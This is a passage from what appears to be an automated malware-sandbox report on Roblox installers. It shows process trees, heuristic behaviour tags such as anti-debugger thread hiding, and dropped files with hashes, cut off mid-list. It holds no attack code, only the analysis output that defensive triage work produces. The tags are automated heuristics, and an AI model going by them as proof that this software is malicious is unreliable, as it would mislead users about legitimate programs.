lX3RpY2tzPSIxMDA2MDM4ODQ1MSIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vbXNlZGdlLmIudGx1LmRsLmRlbGl2ZXJ5Lm1wLm1pY3Jvc29mdC5jb20vZmlsZXN0cmVhbWluZ3NlcnZpY2UvZmlsZXMvNGFkOWNiNmUtODI0NS00ZTQ3LWIyOTgtMWZmNGIwNDI1NmUxP1AxPTE3MjAwNTAxNjMmYW1wO1AyPTQwNCZhbXA7UDM9MiZhbXA7UDQ9bDBacnN2eXNzZ0YwcXRpOUtyZFVhdW51d1JtSHBVM1lxcWdHZmRiNE11dWN1RE9qbEx2anE0ek9HUSUyZjduSExjRHZMYkNCNklaYjRvYXJZdkpSZ1VxZyUzZCUzZCIgc2VydmVyX2lwX2hpbnQ9IiIgY2RuX2NpZD0iLTEiIGNkbl9jY2M9IiIgY2RuX21zZWRnZV9yZWY9IiIgY2RuX2F6dXJlX3JlZl9vcmlnaW5fc2hpZWxkPSIiIGNkbl9jYWNoZT0iIiBjZG5fcDNwPSIiIGRvd25sb2FkZWQ9IjE2MzQzNzYiIHRvdGFsPSIxNjM0Mzc2IiBkb3dubG9hZF90aW1lX21zPSIzOTU1NiIvPjxldmVudCBldmVudHR5cGU9IjE0IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMDA2MDU0NDY5NyIgc291cmNlX3VybF9pbmRleD0iMCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxldmVudCBldmVudHR5cGU9IjE1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxMDA2NTcwMTM4MCIgZG9uZV9iZWZvcmVfb29iZV9jb21wbGV0ZT0iMCIvPjxwaW5nIHI9Ii0xIiByZD0iLTEiLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTI2LjAuMjU5Mi42OCIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGV4cGVyaW1lbnRzPSJjb25zZW50PWZhbHNlIiBpbnN0YWxsYWdlPSIwIiBpbnN0YWxsZGF0ZT0iNjM4NCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSItMSIgcmQ9Ii0xIiBwaW5nX2ZyZXNobmVzcz0iezMwQjIyMjgwLTMzRjQtNEY0Ny1CM0E1LTZGMTI0NjdBMTRENX0iLz48L2FwcD48L3JlcXVlc3Q-
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks system information in the registry
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:1732
                                                                                                • C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe
                                                                                                  "C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\RobloxPlayerBeta.exe"
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • Suspicious use of UnmapMainImage
                                                                                                  PID:4508
                                                                                                • C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe
                                                                                                  "C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe"
                                                                                                  1⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Enumerates system info in registry
                                                                                                  PID:2732
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\Roblox\RobloxStudioInstaller_F63A9\RobloxStudioInstaller.exe -relaunch
                                                                                                    2⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Drops file in Program Files directory
                                                                                                    • Enumerates system info in registry
                                                                                                    • Modifies Internet Explorer settings
                                                                                                    PID:3876
                                                                                                    • C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe
                                                                                                      "C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe" -startEvent www.roblox.com/robloxQTStudioStartedEvent -firstLaunch
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious behavior: AddClipboardFormatListener
                                                                                                      • Suspicious behavior: GetForegroundWindowSpam
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:2372
                                                                                                      • C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe
                                                                                                        "C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe" --no-rate-limit --crashCounter Win-ROBLOXStudio-Crash --baseUrl https://www.roblox.com --attachment=attachment_0.630.0.6300556_20240626T234409Z_Studio_6ED98_last.log=C:\Users\Admin\AppData\Local\Roblox\logs\0.630.0.6300556_20240626T234409Z_Studio_6ED98_last.log --attachment=attachment_log_0.630.0.6300556_20240626T234409Z_Studio_6ED98_csg3.log=C:\Users\Admin\AppData\Local\Roblox\logs\log_0.630.0.6300556_20240626T234409Z_Studio_6ED98_csg3.log --database=C:\Users\Admin\AppData\Local\Roblox\logs\crashes --metrics-dir=C:\Users\Admin\AppData\Local\Roblox\logs\crashes --url=https://upload.crashes.rbxinfra.com/post?format=minidump --annotation=AppVersion=0.630.0.6300556 --annotation=Format=minidump --annotation=HardwareModel= --annotation=HasBootstrapper=true --annotation=InstallFolder=ProgramFilesX86 --annotation=OSPlatform=Windows --annotation=RobloxChannel=production --annotation=RobloxGitHash=ad847d7f5168ecfb2a8f42c2d912f9c436294a66 --annotation=RobloxProduct=RobloxStudio --annotation=StudioVersion=0.630.0.6300556 --annotation=UniqueId=557177522507117585 --annotation=UseCrashpad=True --annotation=app_arch=x86_64 --annotation=application.version=0.630.0.6300556 --annotation=host_arch=x86_64 --initial-client-data=0x4e0,0x4e4,0x4e8,0x42c,0x504,0x7ff7e74d3720,0x7ff7e74d3738,0x7ff7e74d3750
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        PID:4036
                                                                                                      • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=2372.3620.6969348788263939955
                                                                                                        4⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Enumerates system info in registry
                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                        • System policy modification
                                                                                                        PID:2764
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=126.0.2592.68 --initial-client-data=0x11c,0x120,0x124,0x104,0x12c,0x7ffdcb9c0148,0x7ffdcb9c0154,0x7ffdcb9c0160
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:1432
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1676,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1668 /prefetch:2
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:4024
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1620,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:3
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:3348
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1180,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:8
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:2560
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3220,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3236 /prefetch:1
                                                                                                          5⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          PID:5336
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3808,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3816 /prefetch:1
                                                                                                          5⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5740
                                                                                                        • C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3232,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:1
                                                                                                          5⤵
                                                                                                          • Checks computer location settings
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5964
                                                                                                • C:\Windows\System32\GameBarPresenceWriter.exe
                                                                                                  "C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
                                                                                                  1⤵
                                                                                                    PID:2308
                                                                                                  • C:\Windows\System32\GamePanel.exe
                                                                                                    "C:\Windows\System32\GamePanel.exe" 00000000000B02B8 /startuptips
                                                                                                    1⤵
                                                                                                    • Checks SCSI registry key(s)
                                                                                                    PID:5072
                                                                                                  • C:\Windows\System32\bcastdvr.exe
                                                                                                    "C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
                                                                                                    1⤵
                                                                                                    • Drops desktop.ini file(s)
                                                                                                    PID:2716

                                                                                                  Network

                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                  Replay Monitor

                                                                                                  Loading Replay Monitor...

                                                                                                  Downloads

                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeCore\126.0.2592.68\Installer\setup.exe

                                                                                                    Filesize

                                                                                                    6.5MB

                                                                                                    MD5

                                                                                                    05e320ae544022adea3f8c441646765d

                                                                                                    SHA1

                                                                                                    3c6266b8a8c0132a97b2785bcb9ae7546ac02cc9

                                                                                                    SHA256

                                                                                                    e1618f31f476932871871ebc6e63d57aad643b74ea892d3d305e4125df1e6f10

                                                                                                    SHA512

                                                                                                    c1cf5c001ddd6b3b3c68b697f8ec9f1cbd48b5881f9fc805d74eb14a13eedcdf71e958ca1b790353a4edc64008558295741cfb785e0a3824a8f3a62bc985d387

                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\Download\{F3C4FE00-EFD5-403B-9569-398A20F1BA4A}\1.3.187.41\MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe

                                                                                                    Filesize

                                                                                                    1.6MB

                                                                                                    MD5

                                                                                                    a9ad77a4111f44c157a1a37bb29fd2b9

                                                                                                    SHA1

                                                                                                    f1348bcbc950532ac2b48b18acd91533f3ac0be2

                                                                                                    SHA256

                                                                                                    200a59abdeb32cc4d2cec4079be205f18b5f45bae42acb7940151f9780569889

                                                                                                    SHA512

                                                                                                    68f58a15ef5ba5d49d8476bee4a488e9a721f703a645ddd29148915d555ca2eb451635c3b762e5a0f786d69bb5cba9bffac3eeee196f1ec7ad669e2d729fe898

                                                                                                  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

                                                                                                    Filesize

                                                                                                    201KB

                                                                                                    MD5

                                                                                                    4dc57ab56e37cd05e81f0d8aaafc5179

                                                                                                    SHA1

                                                                                                    494a90728d7680f979b0ad87f09b5b58f16d1cd5

                                                                                                    SHA256

                                                                                                    87c6f7d9b58f136aeb33c96dbfe3702083ec519aafca39be66778a9c27a68718

                                                                                                    SHA512

                                                                                                    320eeed88d7facf8c1f45786951ef81708c82cb89c63a3c820ee631c52ea913e64c4e21f0039c1b277cfb710c4d81cd2191878320d00fd006dd777c727d9dc2b

                                                                                                  • C:\Program Files (x86)\Roblox\Versions\RobloxStudioInstaller.exe

                                                                                                    Filesize

                                                                                                    5.4MB

                                                                                                    MD5

                                                                                                    087672ef1f8a03c6fcea3dc8ffdd2a24

                                                                                                    SHA1

                                                                                                    2b01ce0e333d858c24b785584d52ade38cf679a3

                                                                                                    SHA256

                                                                                                    595b1052c954a7e68abcfc53df39db3ec77ac8ec66d187cb39150cd70e3cf601

                                                                                                    SHA512

                                                                                                    54ec51d1e50b0e39a14099da13f1adda591719b58bc6f17a727c6a47461505c4d122fa2100b59029b17a755362f9c435966ad75f5a1df62c6703ab8dd5a2de90

                                                                                                  • C:\Program Files\MsEdgeCrashpad\settings.dat

                                                                                                    Filesize

                                                                                                    280B

                                                                                                    MD5

                                                                                                    30e9af8c7d1add34fde174011f4a8b13

                                                                                                    SHA1

                                                                                                    d467af2283afdd96a76bc38b7dcd188131d9b4a9

                                                                                                    SHA256

                                                                                                    f9a84044ba798b626249b841314fd30986bc977df493c546274856e738cfc882

                                                                                                    SHA512

                                                                                                    312c14e8cdafcb70fce40339b4cfe1bf1b567a22c80664bc4f61d4ed96261d6edab7fabf54e14c05dc94f93cc320867d4ade3890dc7fd5ebd721a2fc6596bd8a

                                                                                                  • C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log

                                                                                                    Filesize

                                                                                                    15KB

                                                                                                    MD5

                                                                                                    5f8ecabe45f1a8d575162338298705c6

                                                                                                    SHA1

                                                                                                    beb96b8360753ed659ddb30a0cd214c9bb97d938

                                                                                                    SHA256

                                                                                                    2adce2dc286f1d82f722bd9e81c75b8a06fe53d84b1c9c15c6461fb95d8f4434

                                                                                                    SHA512

                                                                                                    3c07cbb924cba92f2ca752f9b9fcb692e9c50e501008d2e165b2e1a9b5e9011764ea99f45f0f845b09d6c75de186ca3fa46090e30ca2e29cfa832bf9f196c6c0

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                                                                    Filesize

                                                                                                    40B

                                                                                                    MD5

                                                                                                    c64929d71f8769929406b672778db163

                                                                                                    SHA1

                                                                                                    9dcbf05f8029ec6263ec43b6958a54626adb62d1

                                                                                                    SHA256

                                                                                                    b8d3e55babd999d4d2ada4cdae8d09b2b34321266395960c07ec811d08b91a0a

                                                                                                    SHA512

                                                                                                    9ce6eaea812713c9dc9de55875f5899b21b34e2fd09666590f0a4b3a4c6b3dcce382c5c1e73e01f4066c4b99024cda816ddb324701deabf2756c76e6f5977332

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

                                                                                                    Filesize

                                                                                                    44KB

                                                                                                    MD5

                                                                                                    6228a59044c355fa115198958a84787e

                                                                                                    SHA1

                                                                                                    b058ee1ca9599ecc7ae18af6044885704d16585d

                                                                                                    SHA256

                                                                                                    cc82acce886afea962270eb9f78f236c8f33ba5794f12fca4d184be549f363a8

                                                                                                    SHA512

                                                                                                    524fd3a53b352477248fa765648c67f8f707fad055a5b2d77a213d4e5067661e2d2136d02188dd38838163771c8cb638f7438d099c036b27f3b81a436b9b14e4

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

                                                                                                    Filesize

                                                                                                    264KB

                                                                                                    MD5

                                                                                                    41af98de92f28096b5452387cd83b5fe

                                                                                                    SHA1

                                                                                                    dad411f607df5d5814d90c789a7f4f97bb084544

                                                                                                    SHA256

                                                                                                    a62c3962bdb2d56e2f6e89c15e5d0f4949755fae781e1b28ec7883ec8b1f93f6

                                                                                                    SHA512

                                                                                                    d7bd65eede528789193ea5e8134923d775f0bbed533f6e0a85df430e74f7a453c8d08256da004937045ee49c6124b9bf8e976b454d1ad67bf80551c754610a7f

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_2

                                                                                                    Filesize

                                                                                                    1.0MB

                                                                                                    MD5

                                                                                                    011e4aca502eff80e9b69ba422e1dc72

                                                                                                    SHA1

                                                                                                    be09cade14d8ebb3a8f5e7f0bace2efac4c75dba

                                                                                                    SHA256

                                                                                                    da52c160a1e6e0d2a6a3be6c40de0359229d3ff38cddf01723c635c38874ed95

                                                                                                    SHA512

                                                                                                    9ace6cc51c9eade6f8dc516043ab0a20c05c80e7f2166dec86d07b1a341ec011a966ed8613890d33e807d3955f6b21fa4b139f287e9016e199ed6377e533c554

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3

                                                                                                    Filesize

                                                                                                    4.0MB

                                                                                                    MD5

                                                                                                    4d6525545692428bbcb36c2f314fa7ee

                                                                                                    SHA1

                                                                                                    2d45dde3a11f77bbeea0aefd263554c0f1aa57ed

                                                                                                    SHA256

                                                                                                    4544868e1833deab1d819c3f9cbe97f61f5dcd6cf4bea38a18f375e888e82579

                                                                                                    SHA512

                                                                                                    a18480612d952dbb84175eada163ae14400573091655740d64938eb6deb3164cdde1856f45d9aae5949e6a0b487fd512686591db2df4d723abbfa4b74d35095d

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

                                                                                                    Filesize

                                                                                                    35KB

                                                                                                    MD5

                                                                                                    0baff63ef69dc64878cac097de7055d6

                                                                                                    SHA1

                                                                                                    dea3cba3c8d48c12e0596c91ef2f5d5d59ebc8fa

                                                                                                    SHA256

                                                                                                    86b545062ea8a5118858ff84db189f3abf604334841bd92ad29764888744d529

                                                                                                    SHA512

                                                                                                    0f0423256bb8e2bb9c8900d09cd51b0d80d0a45f3f8fa9be29744661624a879b71e21d550facff592ec8ba53c0cd585f83d294e8ab45dec35c2091700f309971

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007

                                                                                                    Filesize

                                                                                                    69KB

                                                                                                    MD5

                                                                                                    2280e0e4c8efa0f5fc1c10980425f5cf

                                                                                                    SHA1

                                                                                                    1d78ccb26fef7f1bf5bf29de100811e1ac8bda23

                                                                                                    SHA256

                                                                                                    b9225cb1f0df94ebe87b9eb2ad8c63cf664d2dfdb47aeaff785de6c7ce01aa74

                                                                                                    SHA512

                                                                                                    b759fcbf578947c0290ab703652df9f37abb1f9f5cf6140acaa8c4d4ee655ee0ee1f9bee9d4fd210d9e12585a51358b52e0e9c0878abf2713e6fd69a496ac624

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000e

                                                                                                    Filesize

                                                                                                    253KB

                                                                                                    MD5

                                                                                                    83df136302754e5c9b6d3a19ccb8c266

                                                                                                    SHA1

                                                                                                    19ec62c24c1a86426ea1740bba082929f5b3b017

                                                                                                    SHA256

                                                                                                    b03c18803f987261e0bbd0a1709b1772142e7d3f9a22c741a9d88ab95eb53cbb

                                                                                                    SHA512

                                                                                                    4ce9d696e47aa8492996fc7c53f222bce7adc64e669a3487789b850c73132bf1cfa8e67cb1531f26c04c8775a391e9fa92d2ff52f27821ab70949965ec306340

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000f

                                                                                                    Filesize

                                                                                                    94KB

                                                                                                    MD5

                                                                                                    2e33defc64c23c056ec993d434f86f27

                                                                                                    SHA1

                                                                                                    bfd974be3c3467ad1b4ab46fd4049779c001490e

                                                                                                    SHA256

                                                                                                    91a0d8b56e64e289154e16b4ab305bdcda13ff6632cbb81eb8676632325fa328

                                                                                                    SHA512

                                                                                                    148eef503a7929e3ddf10b4995d82f162dbd7ab0b39759582a4294a28c4376de21c627fa831e6a082701bb87c947f1d47c53265198a0779babe8d99e6b84a249

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001d

                                                                                                    Filesize

                                                                                                    87KB

                                                                                                    MD5

                                                                                                    b6692ef1b1b1ca24ca6071b50da45ab6

                                                                                                    SHA1

                                                                                                    14376245a66157fa78c1c30a4a057eb12836e915

                                                                                                    SHA256

                                                                                                    1ecc2aa37ddca596599924b5dc4b7d53acac7857c106ed825d72c71ce1fe57b5

                                                                                                    SHA512

                                                                                                    234d1b1e56632015c0a0b5e92f8ea88f06407cfcb353a6b138222013a1c082b0817075717f1d0bd8a31dac44e69dfd8e842f472cc6438f985cbe24661ca49c60

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                    Filesize

                                                                                                    4KB

                                                                                                    MD5

                                                                                                    40fee15aa5ffa524aa264280280809dc

                                                                                                    SHA1

                                                                                                    724f866410531622be69eaed6cca5f806ab3fd2d

                                                                                                    SHA256

                                                                                                    f47d7ce65c7dcd62bf63eb2877c4743b682c899a0065d83b28cac74ec693528c

                                                                                                    SHA512

                                                                                                    f2877f9b1610ce02d204a58b4ed134957c42dc04ca23cc28cbfdeefe5e330fe83c260980df90c58d0e0ad254a11156548b29bbcb95798115ebcb2659adc5a16d

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                    Filesize

                                                                                                    2KB

                                                                                                    MD5

                                                                                                    9c0e690ada6096d511e7ef809b7fba6f

                                                                                                    SHA1

                                                                                                    cf981651f71498b549ad0b58d27a25a9e3ac7505

                                                                                                    SHA256

                                                                                                    0acee6ce59549beae998999fb907eb6cb92aadf6a6d9917a66013b94ccc7c950

                                                                                                    SHA512

                                                                                                    d525bea99fdc9b24ae3ea427f8066e3ecabd2e5f6810a2da873faea15b64ce4146fc8aab3d0617580ab7875d1e5db794d9c5066a14bab41bd48ba703264eeed9

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

                                                                                                    Filesize

                                                                                                    317B

                                                                                                    MD5

                                                                                                    104ce3972947cbdcf89c989eaf44e81f

                                                                                                    SHA1

                                                                                                    ed71c24a9537f3559f25886571d6c3385a16fd84

                                                                                                    SHA256

                                                                                                    6e0d3b43192f02290f34548ab401a947fe0ad1ba65f5ebc2246f27d57fbd199a

                                                                                                    SHA512

                                                                                                    5e385cdb46cfd0094dc29e1da7516386bb40f9e894d5a43fc5491e17d5f7dc32698c0b77f7501a77d04c809951a0af9fd0905696060a21420581b0a5d6e1b515

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                                                                    Filesize

                                                                                                    264KB

                                                                                                    MD5

                                                                                                    f50f89a0a91564d0b8a211f8921aa7de

                                                                                                    SHA1

                                                                                                    112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                                                                    SHA256

                                                                                                    b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                                                                    SHA512

                                                                                                    bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

                                                                                                    Filesize

                                                                                                    326B

                                                                                                    MD5

                                                                                                    96b5208ac5d9e573b5d7b3a9b0d975a6

                                                                                                    SHA1

                                                                                                    f994b21303735a6d4a2d5d99c8112fea945f0c64

                                                                                                    SHA256

                                                                                                    be165b3cfc62bc8f313aa5f5824d34e2c577b093e48c43e25ebbf72ec8ae56c6

                                                                                                    SHA512

                                                                                                    20d81a8df35d24c36f691b38f00d6768bc81cc19510b9bb395abf216f7a79ec855847e8aeaddddaa6e11ee5e3334c42ce7d7dbba4dc6a9144ff58218a222bec3

                                                                                                  • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

                                                                                                    Filesize

                                                                                                    20KB

                                                                                                    MD5

                                                                                                    832bde6e94c79e219fb899046d2866d4

                                                                                                    SHA1

                                                                                                    d2874d6c58b8e86aaaa2229602ef5e201fff7a66

                                                                                                    SHA256

                                                                                                    7f945b2fa099258f013e8000e4b5d9c8db094e8cf814b75251f4d354643a44b2

                                                                                                    SHA512

